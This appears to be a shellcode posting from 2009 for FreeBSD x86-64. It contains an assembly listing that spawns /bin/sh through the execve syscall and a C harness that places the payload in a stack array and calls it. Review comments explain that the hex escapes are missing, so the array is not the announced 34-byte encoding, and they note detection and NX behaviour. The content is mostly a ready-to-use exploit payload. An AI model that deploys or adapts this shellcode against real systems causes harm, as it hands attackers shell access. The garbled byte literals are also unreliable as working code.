# Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Published : 2009-05-15
# Author : c0d3_z3r0
/*
Anderson Eduardo < c0d3_z3r0 >
Hack'n Roll
http://anderson.hacknroll.com
http://blog.hacknroll.com
.section .text
.globl _start
_start:
xor %rcx,%rcx
jmp string
main:
popq %rsi
movq %rsi,%rdi
pushq %rsi
pushq %rcx
movq %rsp,%rsi
movq %rcx,%rdx
movb $0x3b,%al
syscall
string:
callq main
.string "/bin/sh"
*/
/*
 * Test harness for the assembly listing in the header comment: it places the
 * payload in a local array and then calls that array as if it were a function.
 *
 * NOTE(review): as rendered on this page the string literals below contain no
 * backslashes, so "x48x31xc9" is nine ordinary ASCII characters
 * ('x','4','8',...) and not three opcode bytes. The array therefore does not
 * hold the 34-byte encoding announced in the title; presumably the "\x"
 * escapes were lost when the page was extracted -- confirm against the
 * original posting before drawing conclusions from a build of this text.
 *
 * Returns 0, and only if the call through the array ever returns.
 */
int main(void)
{
/*
 * Automatic (stack) array. Adjacent string literals are concatenated by the
 * compiler and a terminating NUL is appended, so the array is one byte longer
 * than the literal text.
 */
char shellcode[] =
"x48x31xc9"
"xebx10"
"x5e"
"x48x89xf7"
"x56"
"x51"
"x48x89xe6"
"x48x89xca"
/* b0 3b corresponds to `movb $0x3b,%al` in the listing: the system call number
   loaded before `syscall` (execve, per the page title). */
"xb0x3b"
"x0fx05"
"x48xe8xeaxffxffxff"
/*
 * The hex digits in the remaining literals (2f 62 69 6e 2f 73 68) are the
 * ASCII text "/bin/sh" from the listing's .string directive. The path is
 * stored unencoded, so a plain byte or string match on a captured sample
 * will see it.
 */
"x2f"
"x62"
"x69"
"x6e"
"x2f"
"x73x68";
/*
 * Converts the data array to a pointer-to-function and calls it. ISO C does
 * not define the conversion of an object pointer to a function pointer, so
 * this line is undefined behaviour as far as the language is concerned.
 * In practice it can only transfer control where the stack is mapped
 * executable; with non-executable stack enforcement (NX / W^X) the call is
 * expected to fault instead -- verify on the platform being analysed.
 */
(*(void (*)()) shellcode)();
//Hack'n Roll
/* Reached only if the call above returns. */
return 0;
}